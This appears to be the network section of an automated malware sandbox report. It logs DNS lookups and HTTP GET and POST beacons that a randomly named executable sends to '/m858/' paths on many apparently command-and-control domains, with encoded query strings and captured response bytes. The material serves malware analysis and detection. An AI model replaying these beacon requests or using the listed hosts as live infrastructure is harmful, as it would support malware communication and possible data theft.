                                                                                                                      Dec 7, 2023 13:44:55.138226986 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.138251066 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:55.138377905 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.138417959 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:55.138531923 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.138551950 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.138566971 CET804974168.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:55.138592005 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:55.138643026 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:56.284799099 CET4974180192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:57.300605059 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:57.488619089 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.488711119 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:57.488961935 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:57.677089930 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.840565920 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.840626001 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.840698004 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:57.840703011 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.840735912 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.840754986 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.840776920 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:57.840825081 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.840843916 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.840869904 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:57.840902090 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.840945959 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:57.840962887 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.841003895 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.841038942 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.841047049 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:57.841057062 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.841074944 CET804974268.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:44:57.841097116 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:57.841129065 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:44:59.003196001 CET4974280192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:45:00.020015955 CET4974380192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:45:00.209043980 CET804974368.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:00.209218025 CET4974380192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:45:00.210172892 CET4974380192.168.2.868.178.195.71
                                                                                                                      Dec 7, 2023 13:45:00.399490118 CET804974368.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:00.399594069 CET804974368.178.195.71192.168.2.8
                                                                                                                      Dec 7, 2023 13:45:00.558335066 CET804974368.178.195.71192.168.2.8
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                                                      Dec 7, 2023 13:42:23.223315001 CET192.168.2.81.1.1.10x763cStandard query (0)www.ozzventures.shopA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:39.880072117 CET192.168.2.81.1.1.10xa4cdStandard query (0)www.fortunetravelsltd.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:40.878503084 CET192.168.2.81.1.1.10xa4cdStandard query (0)www.fortunetravelsltd.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:41.878931046 CET192.168.2.81.1.1.10xa4cdStandard query (0)www.fortunetravelsltd.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:59.207416058 CET192.168.2.81.1.1.10x875Standard query (0)www.porousworld.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:16.504604101 CET192.168.2.81.1.1.10x1013Standard query (0)www.greenharbor.infoA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:30.410231113 CET192.168.2.81.1.1.10xb0ebStandard query (0)www.lets-room.onlineA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:44.894629002 CET192.168.2.81.1.1.10xbe6bStandard query (0)www.hcfa-cis.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:45.894471884 CET192.168.2.81.1.1.10xbe6bStandard query (0)www.hcfa-cis.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:49.533915997 CET192.168.2.81.1.1.10x66bStandard query (0)www.hcfa-cis.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:50.519128084 CET192.168.2.81.1.1.10x66bStandard query (0)www.hcfa-cis.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:55.879189014 CET192.168.2.81.1.1.10x535cStandard query (0)www.sorenad.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:56.878678083 CET192.168.2.81.1.1.10x535cStandard query (0)www.sorenad.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:44:11.707962990 CET192.168.2.81.1.1.10x9fcbStandard query (0)www.medical-loan24.liveA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:44:26.113320112 CET192.168.2.81.1.1.10xf394Standard query (0)www.speedbikesglobal.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:44:27.112910032 CET192.168.2.81.1.1.10xf394Standard query (0)www.speedbikesglobal.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:44:40.567209959 CET192.168.2.81.1.1.10xefa5Standard query (0)www.belaflorloja.onlineA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:44:54.457103014 CET192.168.2.81.1.1.10x352Standard query (0)www.blessingstation.orgA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:45:08.222816944 CET192.168.2.81.1.1.10xfc48Standard query (0)www.cjjmobbbshhhu.shopA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:45:22.285208941 CET192.168.2.81.1.1.10xabf3Standard query (0)www.hillcresthealth.onlineA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:45:37.239846945 CET192.168.2.81.1.1.10x4166Standard query (0)www.zbbqis.storeA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:45:45.427309036 CET192.168.2.81.1.1.10x7f09Standard query (0)www.hmoatl.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:45:59.081955910 CET192.168.2.81.1.1.10xfa92Standard query (0)www.633922.comA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:46:00.081567049 CET192.168.2.81.1.1.10xfa92Standard query (0)www.633922.comA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                      Dec 7, 2023 13:42:23.666418076 CET1.1.1.1192.168.2.80x763cNo error (0)www.ozzventures.shopozzventures.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:23.666418076 CET1.1.1.1192.168.2.80x763cNo error (0)ozzventures.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:42.954874039 CET1.1.1.1192.168.2.80xa4cdNo error (0)www.fortunetravelsltd.comfortunetravelsltd.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:42.954874039 CET1.1.1.1192.168.2.80xa4cdNo error (0)fortunetravelsltd.com103.210.56.141A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:42.954920053 CET1.1.1.1192.168.2.80xa4cdNo error (0)www.fortunetravelsltd.comfortunetravelsltd.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:42.954920053 CET1.1.1.1192.168.2.80xa4cdNo error (0)fortunetravelsltd.com103.210.56.141A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:42.954953909 CET1.1.1.1192.168.2.80xa4cdNo error (0)www.fortunetravelsltd.comfortunetravelsltd.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:42.954953909 CET1.1.1.1192.168.2.80xa4cdNo error (0)fortunetravelsltd.com103.210.56.141A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:59.446455002 CET1.1.1.1192.168.2.80x875No error (0)www.porousworld.comporousworld.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:42:59.446455002 CET1.1.1.1192.168.2.80x875No error (0)porousworld.com173.231.241.132A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:16.747535944 CET1.1.1.1192.168.2.80x1013No error (0)www.greenharbor.info69.57.161.215A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:30.913320065 CET1.1.1.1192.168.2.80xb0ebNo error (0)www.lets-room.online194.58.112.174A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:46.377741098 CET1.1.1.1192.168.2.80xbe6bServer failure (2)www.hcfa-cis.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:46.377774000 CET1.1.1.1192.168.2.80xbe6bServer failure (2)www.hcfa-cis.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:50.873508930 CET1.1.1.1192.168.2.80x66bServer failure (2)www.hcfa-cis.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:50.873550892 CET1.1.1.1192.168.2.80x66bServer failure (2)www.hcfa-cis.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:56.893209934 CET1.1.1.1192.168.2.80x535cNo error (0)www.sorenad.comsorenad.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:56.893209934 CET1.1.1.1192.168.2.80x535cNo error (0)sorenad.com217.144.107.2A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:57.004695892 CET1.1.1.1192.168.2.80x535cNo error (0)www.sorenad.comsorenad.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:43:57.004695892 CET1.1.1.1192.168.2.80x535cNo error (0)sorenad.com217.144.107.2A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:44:12.045198917 CET1.1.1.1192.168.2.80x9fcbNo error (0)www.medical-loan24.live64.190.62.22A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:44:27.176143885 CET1.1.1.1192.168.2.80xf394No error (0)www.speedbikesglobal.comspeedbikesglobal.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:44:27.176143885 CET1.1.1.1192.168.2.80xf394No error (0)speedbikesglobal.com207.244.126.150A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:44:27.237329960 CET1.1.1.1192.168.2.80xf394No error (0)www.speedbikesglobal.comspeedbikesglobal.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:44:27.237329960 CET1.1.1.1192.168.2.80xf394No error (0)speedbikesglobal.com207.244.126.150A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:44:40.887693882 CET1.1.1.1192.168.2.80xefa5No error (0)www.belaflorloja.onlinebelaflorloja.onlineCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:44:40.887693882 CET1.1.1.1192.168.2.80xefa5No error (0)belaflorloja.online162.240.81.18A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:44:54.588114023 CET1.1.1.1192.168.2.80x352No error (0)www.blessingstation.orgblessingstation.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:44:54.588114023 CET1.1.1.1192.168.2.80x352No error (0)blessingstation.org68.178.195.71A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:45:08.811974049 CET1.1.1.1192.168.2.80xfc48No error (0)www.cjjmobbbshhhu.shopcjjmobbbshhhu.shopCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:45:08.811974049 CET1.1.1.1192.168.2.80xfc48No error (0)cjjmobbbshhhu.shop84.32.84.32A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:45:22.445178986 CET1.1.1.1192.168.2.80xabf3No error (0)www.hillcresthealth.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:45:37.369496107 CET1.1.1.1192.168.2.80x4166Name error (3)www.zbbqis.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:45:45.655332088 CET1.1.1.1192.168.2.80x7f09No error (0)www.hmoatl.comhmoatl.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:45:45.655332088 CET1.1.1.1192.168.2.80x7f09No error (0)hmoatl.com144.217.103.3A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:46:00.275094032 CET1.1.1.1192.168.2.80xfa92No error (0)www.633922.com103.120.80.111A (IP address)IN (0x0001)false
                                                                                                                      Dec 7, 2023 13:46:00.275157928 CET1.1.1.1192.168.2.80xfa92No error (0)www.633922.com103.120.80.111A (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49707 | 84.32.84.32 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:42:23.852123022 CET | 446 | OUT | GET /m858/?w6i=ADXH7n8hwvbLKF6&nRRpS=E3d5DyrEcfJbX1PJB/KGYac5KRSYq3LrneiR+hvnGmPole79cfvMffiwEvZVyE+NwNCm4kMx2S50UNzNVB069nu2XDEJbhHAtQ== HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Host: www.ozzventures.shop
                                                                                                                      Connection: close
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:42:24.028580904 CET | 1286 | IN | HTTP/1.1 200 OK
                                                                                                                      Server: hcdn
                                                                                                                      Date: Thu, 07 Dec 2023 12:42:23 GMT
                                                                                                                      Content-Type: text/html
                                                                                                                      Content-Length: 10066
                                                                                                                      Connection: close
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      x-hcdn-request-id: 1236e23456e6700e985d22f9bdfa11fa-phx-edge4
                                                                                                                      Expires: Thu, 07 Dec 2023 12:42:22 GMT
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;
                                                                                                                      Dec 7, 2023 13:42:24.028650045 CET1286INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 3a 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 30 2e 37 64 65 67 2c 23 65 39 65 64 66 62 20 2d 35 30 2e 32 31 25 2c 23 66 36 66 38 66 64 20 33 31 2e 31 31 25 2c 23 66 66 66 20 31 36 36 2e 30 32 25 29 7d 68 31
                                                                                                                      Data Ascii: background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-w
                                                                                                                      Dec 7, 2023 13:42:24.028770924 CET1286INData Raw: 76 3e 6c 69 3e 61 20 69 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 2d 62 61 72 20 69 6d 67 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f 70 3a 33 70 78 7d 2e 63 6f 6e 67 72 61 74 7a 7b 6d 61 72 67 69 6e 3a
                                                                                                                      Data Ascii: v>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-bo
                                                                                                                      Dec 7, 2023 13:42:24.028846979 CET1286INData Raw: 31 36 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 30 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61
                                                                                                                      Data Ascii: 16px;min-height:20px;min-width:20px;vertical-align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0}
                                                                                                                      Dec 7, 2023 13:42:24.028917074 CET1286INData Raw: 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68
                                                                                                                      Data Ascii: ><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.com/aff
                                                                                                                      Dec 7, 2023 13:42:24.029000998 CET1286INData Raw: 63 65 73 73 66 75 6c 20 6f 6e 6c 69 6e 65 20 70 72 6f 6a 65 63 74 73 2e 3c 2f 70 3e 3c 62 72 3e 3c 61 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 46 69 6e
                                                                                                                      Data Ascii: cessful online projects.</p><br><a href=https://www.hostinger.com rel=nofollow>Find your hosting plan</a></div></div><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title>Add website to your hostin
                                                                                                                      Dec 7, 2023 13:42:24.029098034 CET1286INData Raw: 6e 3c 74 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d 28 36 33 34 38 38 26 28 72 3d 6f 5b 6e 2b 2b 5d 29 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 65 6e 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20 55
                                                                                                                      Data Ascii: n<t;){if(55296==(63488&(r=o[n++])))throw new RangeError("UTF-16(encode): Illegal UTF-16 value");65535<r&&(r-=65536,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=214
                                                                                                                      Dec 7, 2023 13:42:24.029159069 CET1286INData Raw: 69 66 28 74 29 66 6f 72 28 66 3d 30 2c 77 3d 6d 2e 6c 65 6e 67 74 68 3b 66 3c 77 3b 66 2b 2b 29 79 5b 66 5d 26 26 28 6d 5b 66 5d 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6d 5b 66 5d 29 2e 74 6f 55 70 70 65 72 43 61 73 65 28
                                                                                                                      Data Ascii: if(t)for(f=0,w=m.length;f<w;f++)y[f]&&(m[f]=String.fromCharCode(m[f]).toUpperCase().charCodeAt(0));return this.utf16.encode(m)},this.encode=function(t,a){var h,f,i,c,u,d,l,p,g,s,C,w;a&&(w=this.utf16.decode(t));var v=(t=this.utf16.decode(t.toLo
                                                                                                                      Dec 7, 2023 13:42:24.029179096 CET88INData Raw: 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 70 61 74 68 4e 61 6d 65 22 29 3b 61 63 63 6f 75 6e 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 70 75 6e 79 63 6f 64 65 2e 54 6f 55 6e 69 63 6f 64 65 28 70 61 74 68 4e 61 6d 65 29 3c 2f 73
                                                                                                                      Data Ascii: ument.getElementById("pathName");account.innerHTML=punycode.ToUnicode(pathName)</script>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49708 | 103.210.56.141 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe

Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:42:43.398201942 CET | 733 | OUT | POST /m858/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.fortunetravelsltd.com
Origin: http://www.fortunetravelsltd.com
Referer: http://www.fortunetravelsltd.com/m858/
Content-Length: 186
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:42:44.553716898 CET | 1286 | IN | HTTP/1.1 404 Not Found
Connection: close
content-type: text/html; charset=UTF-8
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
link: <https://fortunetravelsltd.com/wp-json/>; rel="https://api.w.org/"
transfer-encoding: chunked
content-encoding: br
vary: Accept-Encoding
date: Thu, 07 Dec 2023 12:42:43 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49709 | 103.210.56.141 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe

Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:42:47.189398050 CET | 753 | OUT | POST /m858/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate, br
Host: www.fortunetravelsltd.com
Origin: http://www.fortunetravelsltd.com
Referer: http://www.fortunetravelsltd.com/m858/
Content-Length: 206
Connection: close
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:42:49.352283955 CET | 1286 | IN | HTTP/1.1 404 Not Found
Connection: close
content-type: text/html; charset=UTF-8
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
link: <https://fortunetravelsltd.com/wp-json/>; rel="https://api.w.org/"
transfer-encoding: chunked
content-encoding: br
vary: Accept-Encoding
date: Thu, 07 Dec 2023 12:42:48 GMT
server: LiteSpeed
referrer-policy: no-referrer-when-downgrade
                                                                                                                      Dec 7, 2023 13:42:49.381628990 CET493INData Raw: cc f6 00 ee 47 30 74 18 73 d8 b3 38 29 bd f3 fc be 59 fc 85 6d af 4a 52 47 d0 fd 28 0f 43 bc a2 42 f8 96 07 c1 3e 08 96 0f 5d 09 41 30 5f 40 b4 07 50 c4 3d c5 44 2f 09 a0 88 0f 56 14 bb 81 fa 38 97 07 da 41 b8 59 8c a6 b5 93 94 78 d9 ff 40 b3 5d
                                                                                                                      Data Ascii: G0ts8)YmJRG(CB>]A0_@P=D/V8AYx@]z{Is]<Q],.KVreh (A/8FzdpIdZ|wr/@~a~|pH#_<OD9[q(:#1;VXhK
                                                                                                                      Dec 7, 2023 13:42:49.383918047 CET1286INData Raw: 38 62 32 0d 0a 98 03 01 40 2e 55 ad 5a 6a 2a 70 cf 81 f4 31 20 30 28 98 17 52 7a 79 38 20 b1 92 20 33 0d 01 05 bf 4e 65 f1 4d fb 57 fb bd 0a 15 97 89 17 75 76 e1 c4 83 5f 42 d8 db 83 00 b0 2b b2 65 54 55 64 74 65 c0 9a 9b aa da 2a d7 a9 12 95 3e
                                                                                                                      Data Ascii: 8b2@.UZj*p1 0(Rzy8 3NeMWuv_B+eTUdte*>>"J<]Ejinun{w>csnmt7k6puri#{aSz6qX0%fI)Mg1P\Y<b2Lpx#


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49710 | 103.210.56.141 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
Dec 7, 2023 13:42:50.122229099 CET | 1766 | OUT | POST /m858/ HTTP/1.1
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Host: www.fortunetravelsltd.com
                                                                                                                      Origin: http://www.fortunetravelsltd.com
                                                                                                                      Referer: http://www.fortunetravelsltd.com/m858/
                                                                                                                      Content-Length: 1218
                                                                                                                      Connection: close
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                      User-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2339 Mobile Safari/537.35+
Dec 7, 2023 13:42:51.943645000 CET | 1286 | IN | HTTP/1.1 404 Not Found
                                                                                                                      Connection: close
                                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                      link: <https://fortunetravelsltd.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                      transfer-encoding: chunked
                                                                                                                      content-encoding: br
                                                                                                                      vary: Accept-Encoding
                                                                                                                      date: Thu, 07 Dec 2023 12:42:51 GMT
                                                                                                                      server: LiteSpeed
                                                                                                                      referrer-policy: no-referrer-when-downgrade


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49711 | 103.210.56.141 | 80 | 6992 | C:\Program Files (x86)\McTNxKnwAlvgWjqnvvTHBgGNyCTPBthmMngIbeAgOsSqvIKrVGCijUGIhHwnIrNzNgBXo\mNtjNwEeCHVoSqPJEzBvhXy.exe
Timestamp | Bytes transferred | Direction | Data
